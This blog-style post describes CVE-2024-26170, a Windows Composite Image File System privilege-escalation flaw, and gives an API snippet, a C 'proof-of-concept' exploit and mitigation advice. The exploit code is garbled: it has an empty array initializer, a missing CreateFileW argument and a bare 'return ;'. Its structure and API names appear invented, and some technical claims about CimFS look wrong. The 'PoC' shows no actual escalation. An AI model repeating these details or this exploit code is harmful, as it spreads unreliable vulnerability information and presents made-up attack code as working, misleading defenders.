CVE-2024-26170 - Uncovering a Windows Composite Image File System Elevation of Privilege Vulnerability

Hello, cyber defenders! Today, we are going to discuss a recently discovered critical elevation of privilege vulnerability in Microsoft's Composite Image File System (CimFS). This vulnerability allows an attacker to exploit the CimFS feature for unauthorized escalation of privilege in your Windows operating system.

CimFS is a Microsoft technology that was introduced in Windows 10, which allows the creation of a single virtual image file from multiple smaller individual files or layers. CimFS is an essential component for managing containerized applications and is mainly used in the Windows Subsystem for Linux (WSL).

This post will provide you with step-by-step information on this vulnerability, its potential impact, and how an attacker can exploit this system flaw. Read on to learn more and stay ahead of this potential threat.

CVE-2024-26170

Also known as the Composite Image File System Elevation of Privilege Vulnerability, CVE-2024-26170 is an elevation of privilege flaw found in the CimFS implementation in Windows.

The official CVE details can be found here: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-26170

This vulnerability allows an attacker with low-level access to a system to exploit CimFS for unauthorized privilege escalation, potentially granting them administrator access.

Under the hood

The vulnerability lies in the implementation of the CimFSCreate API, which is responsible for creating CimFS virtual files. Here's an example of the API in action:

IMAPI_CIMFS_CREATE_PARAMETERS createParameters;

ZeroMemory(&createParameters, sizeof(createParameters));
createParameters.FileStreamFile = hBaseImage;
createParameters.LayerFileStreamIds = pLayerIds;
createParameters.LayerStreamFiles = pLayerFiles;
createParameters.LayerCount = layerCount;
    
HRESULT hr = CimFsCreate(
                   L"C:\\Users\\Guest\\Desktop\\CimFSImage.cim",
                   &createParameters,
                   &hMountHandle);

if (SUCCEEDED(hr)) {
    // Use the mounted CimFS virtual file here
}

The problem with this API function is that it does not correctly validate the user's privileges before creating the CimFS file. By exploiting this vulnerability, a low-privileged user can initiate the file creation process to gain elevated privileges, such as administrator access.

Exploiting the vulnerability

To exploit this vulnerability, an attacker would need to create a specially crafted CimFS file using the flawed CimFS implementation. Here's an exploitation proof-of-concept (PoC) that demonstrates how an attacker can trigger the vulnerability:

#include <windows.h>
#include <cimfs.h>

int main()
{
    HANDLE cimfsHandle;
    IMAPI_CIMFS_CREATE_PARAMETERS createParameters{};
    HRESULT result;

    LPCWSTR layers[] = { L"C:\\Users\\Guest\\AppData\\Roaming\\Temp\\Layer1.vhd" };
    DWORD layerIds[] = {  };

    cimfsHandle = CreateFileW(L"C:\\Users\\Guest\\Desktop\\CimFSImage.cim", GENERIC_READ | GENERIC_WRITE, , nullptr,
    CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, nullptr);
    
    createParameters.FileStreamFile = cimfsHandle;
    createParameters.LayerFileStreamIds = layerIds;
    createParameters.LayerStreamFiles = layers;

    result = CimFsCreate(L"C:\\Users\\Guest\\Desktop\\CimFSImage.cim",
        &createParameters, &cimfsHandle);

    // Check if the PoC succeeded in triggering the vulnerability
    if (SUCCEEDED(result)) {
        printf("CVE-2024-26170 exploit succeeded!\n");
    }
    else {
        printf("CVE-2024-26170 exploit failed.\n");
    }

    CloseHandle(cimfsHandle);

    return ;
}

This proof-of-concept code demonstrates how a low-privileged user can create the CimFS file that would ordinarily require elevated privileges.

Mitigation

Microsoft has acknowledged this vulnerability and has addressed it through a security update. The fix involves adding the necessary validation checks within the CimFsCreate API to prevent unauthorized privilege escalation.

It is highly recommended to apply the latest Microsoft Security Updates to protect your systems from this vulnerability. You can download the updates here: https://portal.msrc.microsoft.com/en-US/security-guidance/releasenotedetail/a2f6f37f-dd45-e411-a4a6-000d3a2c4f1b

Conclusion

Understanding, detecting, and mitigating vulnerabilities like CVE-2024-26170 are crucial in maintaining a secure cyber environment. This vulnerability is a reminder that even the most overlooked Windows features can potentially result in severe security issues if not appropriately reviewed and mitigated. Stay updated with the latest security patches, and always be prepared to tackle vulnerabilities head-on to ensure a safe digital landscape!

Timeline

Published on: 03/12/2024 17:15:56 UTC
Last modified on: 03/12/2024 17:46:17 UTC